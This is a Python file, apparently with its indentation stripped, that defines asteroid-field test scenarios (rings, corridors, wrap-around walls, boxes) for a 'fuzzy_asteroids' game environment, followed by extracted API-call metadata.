ast_x = [R * np.cos(angle + np.pi / 2) + 400 for angle in theta]
ast_y = [R * np.sin(angle + np.pi / 2) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 0})
ring_static_top = Scenario(
name="ring_static_top",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# Static ring bottom
R = 150
theta = np.linspace(0, 2 * np.pi, 17)[1:-2]
ast_x = [R * np.cos(angle + 3 * np.pi / 2) + 400 for angle in theta]
ast_y = [R * np.sin(angle + 3 * np.pi / 2) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 0})
ring_static_bottom = Scenario(
name="ring_static_bottom",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# ---------------------------------------------------------------------------------------------------------------------#
# Normal corridor scenarios -------------------------------------------------------------------------------------------#
# Scenario where ship is in a corridor and forced to shoot its way through
# calculating corridor states
num_x = 17
num_y = 10
x = np.linspace(0, 800, num_x)
y = np.concatenate((np.linspace(0, 200, int(num_y / 2)), np.linspace(400, 600, int(num_y / 2))))
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 0.0, "speed": 0})
# calculate wall asteroid states
ast_states.append({"position": (50, 266), "angle": -90.0, "speed": 0})
ast_states.append({"position": (50, 332), "angle": -90.0, "speed": 0})
corridor_left = Scenario(
name="corridor_left",
asteroid_states=ast_states,
ship_state={"position": (700, 300)},
seed=0
)
# calculate wall asteroid states
ast_states = ast_states[:-2]
ast_states.append({"position": (800, 266), "angle": 90.0, "speed": 20})
ast_states.append({"position": (800, 332), "angle": 90.0, "speed": 20})
corridor_right = Scenario(
name="corridor_right",
asteroid_states=ast_states,
ship_state={"position": (100, 300)},
seed=0
)
# Corridor top scenario
num_x = 14
num_y = 13
x = np.concatenate((np.linspace(0, 300, int(num_x / 2)), np.linspace(500, 800, int(num_x / 2))))
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 0.0, "speed": 0})
# calculate wall asteroid states
ast_states.append({"position": (366, 600), "angle": 180.0, "speed": 20})
ast_states.append({"position": (432, 600), "angle": 180.0, "speed": 20})
corridor_top = Scenario(
name="corridor_top",
asteroid_states=ast_states,
ship_state={"position": (400, 100)},
seed=0
)
# Corridor bottom scenario
# calculate wall asteroid states
ast_states = ast_states[:-2]
ast_states.append({"position": (366, 0), "angle": 0.0, "speed": 20})
ast_states.append({"position": (432, 0), "angle": 0.0, "speed": 20})
corridor_bottom = Scenario(
name="corridor_bottom",
asteroid_states=ast_states,
ship_state={"position": (400, 500)},
seed=0
)
# ---------------------------------------------------------------------------------------------------------------------#
# Moving Corridor Scenarios -------------------------------------------------------------------------------------------#
# Corridor moving right
# calculating corridor states
num_x = 17
num_y = 10
x = np.linspace(0, 800, num_x)
y = np.concatenate((np.linspace(0, 200, int(num_y / 2)), np.linspace(400, 600, int(num_y / 2))))
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 120})
moving_corridor_1 = Scenario(
name="moving_corridor_1",
asteroid_states=ast_states,
ship_state={"position": (400, 300), "angle": 90},
seed=0
)
# Corridor moving left
# calculating corridor states
num_x = 17
num_y = 10
x = np.linspace(0, 800, num_x)
y = np.concatenate((np.linspace(0, 200, int(num_y / 2)), np.linspace(400, 600, int(num_y / 2))))
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 90.0, "speed": 120})
moving_corridor_2 = Scenario(
name="moving_corridor_2",
asteroid_states=ast_states,
ship_state={"position": (400, 300), "angle": -90},
seed=0
)
# Corridor moving down
# calculating corridor states
num_x = 14
num_y = 13
x = np.concatenate((np.linspace(0, 300, int(num_x / 2)), np.linspace(500, 800, int(num_x / 2))))
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 180.0, "speed": 120})
moving_corridor_3 = Scenario(
name="moving_corridor_3",
asteroid_states=ast_states,
ship_state={"position": (400, 300), "angle": 0},
seed=0
)
# Corridor moving up
# calculating corridor states
num_x = 14
num_y = 13
x = np.concatenate((np.linspace(0, 300, int(num_x / 2)), np.linspace(500, 800, int(num_x / 2))))
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 0.0, "speed": 120})
moving_corridor_4 = Scenario(
name="moving_corridor_4",
asteroid_states=ast_states,
ship_state={"position": (400, 300), "angle": 180},
seed=0
)
# Angled corridor scenario 1
# calculating corridor states
num_x = 17
num_y = 13
x = np.linspace(0, 800, num_x)
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
if not (abs(1.5 * ast_x[ii, jj] - ast_y[ii, jj]) <= 160) and not (
abs(-1.5 * ast_x[ii, jj] + 1200 - ast_y[ii, jj]) <= 160):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 30})
moving_corridor_angled_1 = Scenario(
name="moving_corridor_angled_1",
asteroid_states=ast_states,
ship_state={"position": (750, 50), "angle": 90},
seed=0
)
# Angled corridor scenario 2
# calculating corridor states
num_x = 17
num_y = 13
x = np.linspace(0, 800, num_x)
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
if not (abs(-1.5 * ast_x[ii, jj] + 600 - ast_y[ii, jj]) <= 160) and not (
abs(1.5 * ast_x[ii, jj] - 600 - ast_y[ii, jj]) <= 160):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 30})
moving_corridor_angled_2 = Scenario(
name="moving_corridor_angled_2",
asteroid_states=ast_states,
ship_state={"position": (750, 550), "angle": 90},
seed=0
)
# Curved corridor scenario 1
# calculating corridor states
num_x = 17
num_y = 13
x = np.linspace(0, 800, num_x)
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
if not (abs(-(1 / 300) * (ast_x[ii, jj] - 400) ** 2 + 600 - ast_y[ii, jj]) <= 200):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 30})
moving_corridor_curve_1 = Scenario(
name="moving_corridor_curve_1",
asteroid_states=ast_states,
ship_state={"position": (550, 500), "angle": 90},
seed=0
)
# Curved corridor scenario 2
# calculating corridor states
num_x = 30
num_y = 45
x = np.linspace(0, 800, num_x)
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
if not (abs((1 / 300) * (ast_x[ii, jj] - 400) ** 2 - ast_y[ii, jj]) <= 200) and not (
abs((1 / 300) * (ast_x[ii, jj] - 400) ** 2 - ast_y[ii, jj]) >= 300):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 120, "size": 1})
moving_corridor_curve_2 = Scenario(
name="moving_corridor_curve_2",
asteroid_states=ast_states,
ship_state={"position": (550, 100), "angle": 90},
seed=0
)
# ---------------------------------------------------------------------------------------------------------------------#
# Apocalypse scenarios-------------------------------------------------------------------------------------------------#
# Scenario meant to be difficult, probably can't be totally cleared
# currently the vehicle spawns on top of asteroids. It won't kill the vehicle until you fire though
scenario_apocalypse_1 = Scenario(name="apocalypse_1", num_asteroids=50, seed=1)
# ---------------------------------------------------------------------------------------------------------------------#
# Forcing wrap scenarios-----------------------------------------------------------------------------------------------#
# Wrap right scenarios
wall_right_wrap_1 = Scenario(
name="wall_right_wrap_1",
asteroid_states=[{"position": (600, 0), "angle": -90.0, "speed": 80},
{"position": (600, 100), "angle": -90.0, "speed": 80},
{"position": (600, 200), "angle": -90.0, "speed": 80},
{"position": (600, 300), "angle": -90.0, "speed": 80},
{"position": (600, 400), "angle": -90.0, "speed": 80},
{"position": (600, 500), "angle": -90.0, "speed": 80},
{"position": (600, 600), "angle": -90.0, "speed": 80},
],
ship_state={"position": (750, 300)},
seed=0
)
wall_right_wrap_2 = Scenario(
name="wall_right_wrap_2",
asteroid_states=[{"position": (750, 0), "angle": -90.0, "speed": 80},
{"position": (750, 100), "angle": -90.0, "speed": 80},
{"position": (750, 200), "angle": -90.0, "speed": 80},
{"position": (750, 300), "angle": -90.0, "speed": 80},
{"position": (750, 400), "angle": -90.0, "speed": 80},
{"position": (750, 500), "angle": -90.0, "speed": 80},
{"position": (750, 600), "angle": -90.0, "speed": 80},
],
ship_state={"position": (50, 300)},
seed=0
)
wall_right_wrap_3 = Scenario(
name="wall_right_wrap_3",
asteroid_states=[{"position": (600, 0), "angle": -90.0, "speed": 80},
{"position": (600, 100), "angle": -90.0, "speed": 80},
{"position": (600, 200), "angle": -90.0, "speed": 80},
{"position": (600, 300), "angle": -90.0, "speed": 80},
{"position": (600, 400), "angle": -90.0, "speed": 80},
{"position": (600, 500), "angle": -90.0, "speed": 80},
{"position": (600, 600), "angle": -90.0, "speed": 80},
{"position": (200, 0), "angle": -90.0, "speed": 0},
{"position": (200, 100), "angle": -90.0, "speed": 0},
{"position": (200, 200), "angle": -90.0, "speed": 0},
{"position": (200, 300), "angle": -90.0, "speed": 0},
{"position": (200, 400), "angle": -90.0, "speed": 0},
{"position": (200, 500), "angle": -90.0, "speed": 0},
{"position": (200, 600), "angle": -90.0, "speed": 0},
],
ship_state={"position": (750, 300)},
seed=0
)
wall_right_wrap_4 = Scenario(
name="wall_right_wrap_4",
asteroid_states=[{"position": (750, 0), "angle": -90.0, "speed": 80},
{"position": (750, 100), "angle": -90.0, "speed": 80},
{"position": (750, 200), "angle": -90.0, "speed": 80},
{"position": (750, 300), "angle": -90.0, "speed": 80},
{"position": (750, 400), "angle": -90.0, "speed": 80},
{"position": (750, 500), "angle": -90.0, "speed": 80},
{"position": (750, 600), "angle": -90.0, "speed": 80},
{"position": (200, 0), "angle": -90.0, "speed": 0},
{"position": (200, 100), "angle": -90.0, "speed": 0},
{"position": (200, 200), "angle": -90.0, "speed": 0},
{"position": (200, 300), "angle": -90.0, "speed": 0},
{"position": (200, 400), "angle": -90.0, "speed": 0},
{"position": (200, 500), "angle": -90.0, "speed": 0},
{"position": (200, 600), "angle": -90.0, "speed": 0},
],
ship_state={"position": (50, 300)},
seed=0
)
# Wrap left scenarios
wall_left_wrap_1 = Scenario(
name="wall_left_wrap_1",
asteroid_states=[{"position": (200, 0), "angle": 90.0, "speed": 80},
{"position": (200, 100), "angle": 90.0, "speed": 80},
{"position": (200, 200), "angle": 90.0, "speed": 80},
{"position": (200, 300), "angle": 90.0, "speed": 80},
{"position": (200, 400), "angle": 90.0, "speed": 80},
{"position": (200, 500), "angle": 90.0, "speed": 80},
{"position": (200, 600), "angle": 90.0, "speed": 80},
],
ship_state={"position": (50, 300)},
seed=0
)
wall_left_wrap_2 = Scenario(
name="wall_left_wrap_2",
asteroid_states=[{"position": (50, 0), "angle": 90.0, "speed": 80},
{"position": (50, 100), "angle": 90.0, "speed": 80},
{"position": (50, 200), "angle": 90.0, "speed": 80},
{"position": (50, 300), "angle": 90.0, "speed": 80},
{"position": (50, 400), "angle": 90.0, "speed": 80},
{"position": (50, 500), "angle": 90.0, "speed": 80},
{"position": (50, 600), "angle": 90.0, "speed": 80},
],
ship_state={"position": (750, 300)},
seed=0
)
wall_left_wrap_3 = Scenario(
name="wall_left_wrap_3",
asteroid_states=[{"position": (200, 0), "angle": 90.0, "speed": 80},
{"position": (200, 100), "angle": 90.0, "speed": 80},
{"position": (200, 200), "angle": 90.0, "speed": 80},
{"position": (200, 300), "angle": 90.0, "speed": 80},
{"position": (200, 400), "angle": 90.0, "speed": 80},
{"position": (200, 500), "angle": 90.0, "speed": 80},
{"position": (200, 600), "angle": 90.0, "speed": 80},
{"position": (600, 0), "angle": -90.0, "speed": 0},
{"position": (600, 100), "angle": -90.0, "speed": 0},
{"position": (600, 200), "angle": -90.0, "speed": 0},
{"position": (600, 300), "angle": -90.0, "speed": 0},
{"position": (600, 400), "angle": -90.0, "speed": 0},
{"position": (600, 500), "angle": -90.0, "speed": 0},
{"position": (600, 600), "angle": -90.0, "speed": 0},
],
ship_state={"position": (50, 300)},
seed=0
)
wall_left_wrap_4 = Scenario(
name="wall_left_wrap_4",
asteroid_states=[{"position": (50, 0), "angle": 90.0, "speed": 80},
{"position": (50, 100), "angle": 90.0, "speed": 80},
{"position": (50, 200), "angle": 90.0, "speed": 80},
{"position": (50, 300), "angle": 90.0, "speed": 80},
{"position": (50, 400), "angle": 90.0, "speed": 80},
{"position": (50, 500), "angle": 90.0, "speed": 80},
{"position": (50, 600), "angle": 90.0, "speed": 80},
{"position": (600, 0), "angle": -90.0, "speed": 0},
{"position": (600, 100), "angle": -90.0, "speed": 0},
{"position": (600, 200), "angle": -90.0, "speed": 0},
{"position": (600, 300), "angle": -90.0, "speed": 0},
{"position": (600, 400), "angle": -90.0, "speed": 0},
{"position": (600, 500), "angle": -90.0, "speed": 0},
{"position": (600, 600), "angle": -90.0, "speed": 0},
],
ship_state={"position": (750, 300)},
seed=0
)
# Wrap top scenarios
wall_top_wrap_1 = Scenario(
name="wall_top_wrap_1",
asteroid_states=[{"position": (0, 400), "angle": 0.0, "speed": 80},
{"position": (100, 400), "angle": 0.0, "speed": 80},
{"position": (200, 400), "angle": 0.0, "speed": 80},
{"position": (300, 400), "angle": 0.0, "speed": 80},
{"position": (400, 400), "angle": 0.0, "speed": 80},
{"position": (500, 400), "angle": 0.0, "speed": 80},
{"position": (600, 400), "angle": 0.0, "speed": 80},
{"position": (700, 400), "angle": 0.0, "speed": 80},
{"position": (800, 400), "angle": 0.0, "speed": 80},
],
ship_state={"position": (400, 550)},
seed=0
)
wall_top_wrap_2 = Scenario(
name="wall_top_wrap_2",
asteroid_states=[{"position": (0, 400), "angle": 0.0, "speed": 80},
{"position": (100, 400), "angle": 0.0, "speed": 80},
{"position": (200, 400), "angle": 0.0, "speed": 80},
{"position": (300, 400), "angle": 0.0, "speed": 80},
{"position": (400, 400), "angle": 0.0, "speed": 80},
{"position": (500, 400), "angle": 0.0, "speed": 80},
{"position": (600, 400), "angle": 0.0, "speed": 80},
{"position": (700, 400), "angle": 0.0, "speed": 80},
{"position": (800, 400), "angle": 0.0, "speed": 80},
],
ship_state={"position": (400, 50)},
seed=0
)
wall_top_wrap_3 = Scenario(
name="wall_top_wrap_3",
asteroid_states=[{"position": (0, 400), "angle": 0.0, "speed": 80},
{"position": (100, 400), "angle": 0.0, "speed": 80},
{"position": (200, 400), "angle": 0.0, "speed": 80},
{"position": (300, 400), "angle": 0.0, "speed": 80},
{"position": (400, 400), "angle": 0.0, "speed": 80},
{"position": (500, 400), "angle": 0.0, "speed": 80},
{"position": (600, 400), "angle": 0.0, "speed": 80},
{"position": (700, 400), "angle": 0.0, "speed": 80},
{"position": (800, 400), "angle": 0.0, "speed": 80},
{"position": (0, 200), "angle": 0.0, "speed": 0},
{"position": (100, 200), "angle": 0.0, "speed": 0},
{"position": (200, 200), "angle": 0.0, "speed": 0},
{"position": (300, 200), "angle": 0.0, "speed": 0},
{"position": (400, 200), "angle": 0.0, "speed": 0},
{"position": (500, 200), "angle": 0.0, "speed": 0},
{"position": (600, 200), "angle": 0.0, "speed": 0},
{"position": (700, 200), "angle": 0.0, "speed": 0},
{"position": (800, 200), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 550)},
seed=0
)
wall_top_wrap_4 = Scenario(
name="wall_top_wrap_4",
asteroid_states=[{"position": (0, 400), "angle": 0.0, "speed": 80},
{"position": (100, 400), "angle": 0.0, "speed": 80},
{"position": (200, 400), "angle": 0.0, "speed": 80},
{"position": (300, 400), "angle": 0.0, "speed": 80},
{"position": (400, 400), "angle": 0.0, "speed": 80},
{"position": (500, 400), "angle": 0.0, "speed": 80},
{"position": (600, 400), "angle": 0.0, "speed": 80},
{"position": (700, 400), "angle": 0.0, "speed": 80},
{"position": (800, 400), "angle": 0.0, "speed": 80},
{"position": (0, 200), "angle": 0.0, "speed": 0},
{"position": (100, 200), "angle": 0.0, "speed": 0},
{"position": (200, 200), "angle": 0.0, "speed": 0},
{"position": (300, 200), "angle": 0.0, "speed": 0},
{"position": (400, 200), "angle": 0.0, "speed": 0},
{"position": (500, 200), "angle": 0.0, "speed": 0},
{"position": (600, 200), "angle": 0.0, "speed": 0},
{"position": (700, 200), "angle": 0.0, "speed": 0},
{"position": (800, 200), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 50)},
seed=0
)
# Wrap bottom scenarios
wall_bottom_wrap_1 = Scenario(
name="wall_bottom_wrap_1",
asteroid_states=[{"position": (0, 200), "angle": 180.0, "speed": 80},
{"position": (100, 200), "angle": 180.0, "speed": 80},
{"position": (200, 200), "angle": 180.0, "speed": 80},
{"position": (300, 200), "angle": 180.0, "speed": 80},
{"position": (400, 200), "angle": 180.0, "speed": 80},
{"position": (500, 200), "angle": 180.0, "speed": 80},
{"position": (600, 200), "angle": 180.0, "speed": 80},
{"position": (700, 200), "angle": 180.0, "speed": 80},
{"position": (800, 200), "angle": 180.0, "speed": 80},
],
ship_state={"position": (400, 50)},
seed=0
)
wall_bottom_wrap_2 = Scenario(
name="wall_bottom_wrap_2",
asteroid_states=[{"position": (0, 200), "angle": 180.0, "speed": 80},
{"position": (100, 200), "angle": 180.0, "speed": 80},
{"position": (200, 200), "angle": 180.0, "speed": 80},
{"position": (300, 200), "angle": 180.0, "speed": 80},
{"position": (400, 200), "angle": 180.0, "speed": 80},
{"position": (500, 200), "angle": 180.0, "speed": 80},
{"position": (600, 200), "angle": 180.0, "speed": 80},
{"position": (700, 200), "angle": 180.0, "speed": 80},
{"position": (800, 200), "angle": 180.0, "speed": 80},
],
ship_state={"position": (400, 550)},
seed=0
)
wall_bottom_wrap_3 = Scenario(
name="wall_bottom_wrap_3",
asteroid_states=[{"position": (0, 200), "angle": 180.0, "speed": 80},
{"position": (100, 200), "angle": 180.0, "speed": 80},
{"position": (200, 200), "angle": 180.0, "speed": 80},
{"position": (300, 200), "angle": 180.0, "speed": 80},
{"position": (400, 200), "angle": 180.0, "speed": 80},
{"position": (500, 200), "angle": 180.0, "speed": 80},
{"position": (600, 200), "angle": 180.0, "speed": 80},
{"position": (700, 200), "angle": 180.0, "speed": 80},
{"position": (800, 200), "angle": 180.0, "speed": 80},
{"position": (0, 400), "angle": 0.0, "speed": 0},
{"position": (100, 400), "angle": 0.0, "speed": 0},
{"position": (200, 400), "angle": 0.0, "speed": 0},
{"position": (300, 400), "angle": 0.0, "speed": 0},
{"position": (400, 400), "angle": 0.0, "speed": 0},
{"position": (500, 400), "angle": 0.0, "speed": 0},
{"position": (600, 400), "angle": 0.0, "speed": 0},
{"position": (700, 400), "angle": 0.0, "speed": 0},
{"position": (800, 400), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 50)},
seed=0
)
wall_bottom_wrap_4 = Scenario(
name="wall_bottom_wrap_4",
asteroid_states=[{"position": (0, 200), "angle": 180.0, "speed": 80},
{"position": (100, 200), "angle": 180.0, "speed": 80},
{"position": (200, 200), "angle": 180.0, "speed": 80},
{"position": (300, 200), "angle": 180.0, "speed": 80},
{"position": (400, 200), "angle": 180.0, "speed": 80},
{"position": (500, 200), "angle": 180.0, "speed": 80},
{"position": (600, 200), "angle": 180.0, "speed": 80},
{"position": (700, 200), "angle": 180.0, "speed": 80},
{"position": (800, 200), "angle": 180.0, "speed": 80},
{"position": (0, 400), "angle": 0.0, "speed": 0},
{"position": (100, 400), "angle": 0.0, "speed": 0},
{"position": (200, 400), "angle": 0.0, "speed": 0},
{"position": (300, 400), "angle": 0.0, "speed": 0},
{"position": (400, 400), "angle": 0.0, "speed": 0},
{"position": (500, 400), "angle": 0.0, "speed": 0},
{"position": (600, 400), "angle": 0.0, "speed": 0},
{"position": (700, 400), "angle": 0.0, "speed": 0},
{"position": (800, 400), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 550)},
seed=0
)
# A scenario with a big non moving box
scenario_big_box = Scenario(
name="big_box",
asteroid_states=[{"position": (100, 600), "angle": 0.0, "speed": 0},
{"position": (200, 600), "angle": 0.0, "speed": 0},
{"position": (300, 600), "angle": 0.0, "speed": 0},
{"position": (400, 600), "angle": 0.0, "speed": 0},
{"position": (500, 600), "angle": 0.0, "speed": 0},
{"position": (600, 600), "angle": 0.0, "speed": 0},
{"position": (700, 600), "angle": 0.0, "speed": 0},
{"position": (100, 0), "angle": 0.0, "speed": 0},
{"position": (200, 0), "angle": 0.0, "speed": 0},
{"position": (300, 0), "angle": 0.0, "speed": 0},
{"position": (400, 0), "angle": 0.0, "speed": 0},
{"position": (500, 0), "angle": 0.0, "speed": 0},
{"position": (600, 0), "angle": 0.0, "speed": 0},
{"position": (700, 0), "angle": 0.0, "speed": 0},
{"position": (800, 0), "angle": 0.0, "speed": 0},
{"position": (0, 0), "angle": 0.0, "speed": 0},
{"position": (0, 100), "angle": 0.0, "speed": 0},
{"position": (0, 200), "angle": 0.0, "speed": 0},
{"position": (0, 300), "angle": 0.0, "speed": 0},
{"position": (0, 400), "angle": 0.0, "speed": 0},
{"position": (0, 500), "angle": 0.0, "speed": 0},
{"position": (0, 600), "angle": 0.0, "speed": 0},
{"position": (800, 100), "angle": 0.0, "speed": 0},
{"position": (800, 200), "angle": 0.0, "speed": 0},
{"position": (800, 300), "angle": 0.0, "speed": 0},
{"position": (800, 400), "angle": 0.0, "speed": 0},
{"position": (800, 500), "angle": 0.0, "speed": 0},
{"position": (800, 600), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 300)},
seed=0
)
# A scenario with a little non moving box
scenario_small_box = Scenario(
name="small_box",
asteroid_states=[{"position": (200, 500), "angle": 0.0, "speed": 0},
{"position": (300, 500), "angle": 0.0, "speed": 0},
{"position": (400, 500), "angle": 0.0, "speed": 0},
{"position": (500, 500), "angle": 0.0, "speed": 0},
{"position": (200, 100), "angle": 0.0, "speed": 0},
{"position": (300, 100), "angle": 0.0, "speed": 0},
{"position": (400, 100), "angle": 0.0, "speed": 0},
{"position": (500, 100), "angle": 0.0, "speed": 0},
{"position": (600, 100), "angle": 0.0, "speed": 0},
{"position": (200, 200), "angle": 0.0, "speed": 0},
{"position": (200, 300), "angle": 0.0, "speed": 0},
{"position": (200, 400), "angle": 0.0, "speed": 0},
{"position": (600, 200), "angle": 0.0, "speed": 0},
{"position": (600, 300), "angle": 0.0, "speed": 0},
{"position": (600, 400), "angle": 0.0, "speed": 0},
{"position": (600, 500), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 300)},
seed=0
)
# A scenario with a big non moving box
scenario_2_still_corridors = Scenario(
name="scenario_2_still_corridors",
asteroid_states=[{"position": (0, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (50, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (100, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (150, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (200, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (250, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (300, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (0, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (50, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (100, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (150, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (200, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (250, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (300, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (500, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (550, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (600, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (650, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (700, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (750, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (800, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (500, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (550, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (600, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (650, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (700, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (750, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (800, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 0), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 50), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 100), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 150), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 200), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 0), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 50), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 100), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 150), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 200), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 400), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 450), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 500), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 550), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 600), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 400), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 450), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 500), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 550), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 600), "angle": 0.0, "speed": 0, "size": 2},
],
ship_state={"position": (400, 300)},
seed=0
)
|
[
"numpy.linspace",
"numpy.cos",
"numpy.sin",
"numpy.meshgrid",
"fuzzy_asteroids.util.Scenario"
] |
[((224, 430), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""threat_test_1"""', 'asteroid_states': "[{'position': (0, 300), 'angle': -90.0, 'speed': 40}, {'position': (700, \n 300), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (600, 300)}", 'seed': '(0)'}), "(name='threat_test_1', asteroid_states=[{'position': (0, 300),\n 'angle': -90.0, 'speed': 40}, {'position': (700, 300), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (600, 300)}, seed=0)\n", (232, 430), False, 'from fuzzy_asteroids.util import Scenario\n'), ((502, 709), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""threat_test_2"""', 'asteroid_states': "[{'position': (800, 300), 'angle': 90.0, 'speed': 40}, {'position': (100, \n 300), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (200, 300)}", 'seed': '(0)'}), "(name='threat_test_2', asteroid_states=[{'position': (800, 300),\n 'angle': 90.0, 'speed': 40}, {'position': (100, 300), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (200, 300)}, seed=0)\n", (510, 709), False, 'from fuzzy_asteroids.util import Scenario\n'), ((781, 985), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""threat_test_3"""', 'asteroid_states': "[{'position': (400, 0), 'angle': 0.0, 'speed': 40}, {'position': (400, 550),\n 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 450)}", 'seed': '(0)'}), "(name='threat_test_3', asteroid_states=[{'position': (400, 0),\n 'angle': 0.0, 'speed': 40}, {'position': (400, 550), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (400, 450)}, seed=0)\n", (789, 985), False, 'from fuzzy_asteroids.util import Scenario\n'), ((1057, 1264), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""threat_test_4"""', 'asteroid_states': "[{'position': (400, 600), 'angle': 180.0, 'speed': 40}, {'position': (400, \n 50), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 150)}", 'seed': '(0)'}), 